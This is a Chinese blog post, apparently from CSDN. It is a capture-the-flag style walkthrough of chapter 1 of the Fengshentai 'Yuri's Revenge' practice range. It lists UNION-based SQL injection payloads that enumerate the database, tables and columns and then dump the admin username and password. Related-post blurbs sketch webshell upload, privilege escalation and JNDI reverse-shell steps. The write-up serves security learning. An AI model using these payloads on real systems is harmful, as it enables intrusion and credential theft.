封神台尤里的复仇Ⅰ 小芳 第一章

最新推荐文章于 2024-06-18 20:25:03 发布
最新推荐文章于 2024-06-18 20:25:03 发布
阅读量167 收藏 4
点赞数 6
分类专栏: 封神台靶场合集 文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shierbai/article/details/138750356
版权

也是刚过完白嫖课程,来试试靶场,经过群友的推荐,来做封神台的靶场学习一下。

话不多说,上图

首先第一章是个sql注入,没有任何waf之类的,首先点击查看新闻

?id=1 and 1=1

?id=1 and 1=2

可以看到很明显的注入点,语句测试类型,可以看到1=2的情况是没有返回内容的,基本可以确定是数字型的

那么接下来就尝试order by语句

?id=1 order by 2

by 3的时候报错,那么就是2个字段,再判断回显位置

?id=1111 union select 1,2

这里起初没看到图片花边下面的数字,还觉得奇怪,在用盲注,结果是我自己视力问题,言归正传,这里需要注意前面的id需要是一个不存在的值,否则不会回显我们想看到的回显数字2

找到回显位置后,利用联合查询依次数据库,表名,列名等

?id=1111 union select 1,database()

?id=1111 union select 1,group_concat(table_name) from information_schema.tables where table_schema='maoshe'

?id=1111 union select 1,group_concat(column_name) from information_schema.columns where table_name='admin'

?id=1111 union select 1,group_concat(username,id,password) from admin

管理员密码是hellohack,后面那个一眼广告

提交即可

shierbai
关注
  • 6
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
神台尤里复仇小芳 第五章
shierbai的博客
05-12 296
那么就只能再上传一个已经组装好的wscript.shell,也就是下图的iis6.exe。自己在d盘上传一个cmd.exe,这里最好是用菜刀连接,且cmd.exe需要是win2003的,网上自行下载。netstat -ano看哪个端口对应的pid是2408,这里端口号是3389。这里直接有我直接下载后再上传到相同目录,关闭后再打开cmd.exe的虚拟终端。但我们可以看到我们只是一个普通用户,需要让自己变成一个管理员。我这里传在Inc下,用上传的cmd.exe打开虚拟终端。输就完了,会赢吗,包赢的啊。
神台尤里复仇小芳 第九章
shierbai的博客
05-12 598
编译环境和攻击机的环境要一致,否则会一直无法反弹成功,我都使用jdk-8u201的,各位看自己情况。这里只介绍简单的一种方法,在进行前可以先用dnslog平台进行漏洞验证,此处不做赘述,然后构造payload往交互的地方,/*用户名密码都行*/一丢就完事。此关需要用vps,否则网站无法连接到我们,无法进行反弹连接。注意自己vps的架构,否则配置完也会报找不到路径。再起一个窗口开启监听,我这里用的xshell。这关对环境要求非常高!此处有数据交互,选取此处进行jndi注入。需要一致,否则不成功。
神台尤里复仇小芳 第四章
shierbai的博客
05-12 492
用菜刀进行连接,需要注意,如果你使用的是蚁剑,那么你后续需要找一个很小的win2003的cmd.exe,仅此处不是很推荐用蚁剑。如题,然后找文件上传点,翻过来翻过去找到这里,这里建议选后面一点的产品进行上传,不然连接后续可能会被挤下去断开连接。这里需要注意如果后缀是.jpg,那么文件不被解析,cer是被解析的。这里可以看到做了白名单处理,就需要用IIS6文件解析漏洞去做绕过。生成成功后开启burpsuite进行抓包,点击上传。f12 ,存储,点击左侧cookie进行修改。然后保存修改结果,预览产品内容。
神台尤里复仇小芳 第三章
shierbai的博客
05-12 151
alert(1)
神台尤里复仇小芳 第二章
shierbai的博客
05-12 278
考虑报错注入,updatexml()被过滤,使用extractvalue()进行尝试发现并不出现报错回显,这里我想到了盲注,但盲注怪麻烦的,而且还不一定过滤了什么,有想法的可以拿sqlmap跑一下试试,于是我转换了一下思路,之前在sqli-labs里有做请求头部注入和cookie注入,此处对cookie没有做过滤,于是打开了burpsuite进行抓包。然后在cookie处修改(一定要用加号连接且from+admin也不能缺,这里是对表名做了猜测,否则仍然显示数据库出错)可以看到页面是有回显的。
神台尤里复仇小芳 第七章
shierbai的博客
05-12 182
这里可以看到做了mime检测,直接抓包改content-type为image/jpeg就可以了。这里方法有好几种,这里我是用文件上传去做的,可能有疑问为什么不用扫目录啥的,这里露cms了按理可以直接搜索该cms的漏洞去直接做复现就行了。既然明确目标是文件上传,那么直接找上传点,如图。把那个图片拖出去复制url。
神台尤里复仇小芳 第六章
shierbai的博客
05-12 127
直接右键文件属性,安全,高级,将拒绝更改为允许。还以为是welcome,果然不可能这么简单。这里可以看到是wow!直接在文件里面搜mimikatz。这里注意flag的wow不是大写。来到这个目录下,可劲挨着点。注意范围,不然可能搜不到。
神台——尤里复仇小芳
ASD830的博客
03-21 377
我们可以查出“admin“”表里 有 “id” “username” “password” 三个字段。题目说让我们拿到管理员账户的密码,我们看一下username和password字段的内容。尤里正在追女神小芳,在得知小芳开了一家公司后,尤里通过whois查询发现了小芳公司网站。根据提示我们需要浅浅的sql注入一下,首先判断一下是否存在SQL注入漏洞。学过一点黑客技术的他,想在女神面前炫炫技。页面不正常,说明存在SQL注入漏洞。页面出现了2,说明我们的回显位为2。页面不正常,判断出字段数为2。
神台尤里复仇小芳 第八章
shierbai的博客
05-12 124
看到有验证码,我最先考虑的是用插件进行验证码识别然后进行爆破,但此处大米cms存在验证码复用的漏洞,所以大家信息收集要做好。bp抓包,右键send to intruder。没扫出来,先进robots.txt看看。随便输点什么,验证码一定要输对。这关最简单了,丢工具完事。审题,因此做后台扫描。
尤里复仇WIN10全屏切换不黑屏补丁
07-29
把补丁放入游戏目录就可以了,网上一直没找到,提取的另外版本弄来的反复测试了很久找到的文件大家给个辛苦积分,红色警戒2尤里复仇V1.001版测试成功,时间2023-7-29
红色警戒尤里复仇魔改
01-16
内容丰富极小极大搜索算法 alpha-beta剪枝算法 课后习题 PPT 提高博弈程序效率 (PS:极大极小值算大应该是深度
YuriExtension:命令与征服尤里复仇的修复和扩展
06-10
它是什么? YuriExtension 是命令与征服 Yuri's Revenge 的修复和扩展,旨在在现代 Microsoft Windows 上运行。 目前可用的功能 使用 UDP 代替 IPX 能够在 Windows Vista 及更高版本上播放网络。...
易语言红警2尤里复仇修改器源码.rar
12-18
修改金币,建筑秒建,适于新手练习找基址和冷却地址
局域网对战玩红警红色警戒--尤里复仇.pdf
11-06
局域网对战玩红警红色警戒--尤里复仇.pdf
SQLAlchemy 连接池
youhebuke225的博客
06-17 280
调整这些参数可以帮助你更好地管理数据库连接,并减少因连接超时或服务器断开连接而导致的问题。记得根据你的应用程序的需求和数据库服务器的配置来合理设置这些参数。在 SQLAlchemy 中,确实可以通过配置连接池的参数来管理连接的超时和回收,从而确保连接在需要时能够被重新建立。SQLAlchemy 使用的是。作为其默认的连接池实现。为了配置这些参数,你可以在创建引擎时将它们传递给。
PostgreSQL源码分析——CREATE DATABASE
让我思考一下
06-18 679
这里我们分析一下在PostgreSQL中创建数据库的源码,在分析源码之前,最好先阅读《PostgreSQL指南内幕探索》的第一章数据库集簇、数据库和数据表,弄清其空间布局,理解PG中,数据库、表、元组是怎么布局的。通俗一点说,创建一个数据库相当于创建一个数据目录,在这个目录下,存放该数据库中定义的表、索引等对象。
PostgreSQL源码分析——INSERT
最新发布
让我思考一下
06-18 373
这里我们对INSERT语句进行分析, 只分析其宏观过程,具体细节后续再分析。我们就分析下面的语句的执行过程。
PostgreSQL源码分析——CREATE TYPE
让我思考一下
06-18 408
定义一个复合类型某种程度上就是定义一张新的表,表的rowtype就是复合类型。会看到创建一个复合类型的同时会创建一个同名的表。这个表可以在pg_class系统表中查到,但是通过\d等却查不到,也不能想表中插入数据,因为它并不是真正意义上的表,只是用表实现复合类型。这部分因为不是可优化语句,没有什么处理。这部分因为是Utility语句,没有什么处理的。创建复合类型,我们分析一下其源码实现。
用C需要写一个冒泡排序
05-12
好的,以下是C语言实现冒泡排序的示例代码: ```c #include void bubble_sort(int arr[], int size) { int i, j, temp; for (i = 0; i ;...以上代码实现了冒泡排序,使用了两层循环,时间复杂度为O(n^2),不过冒泡...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值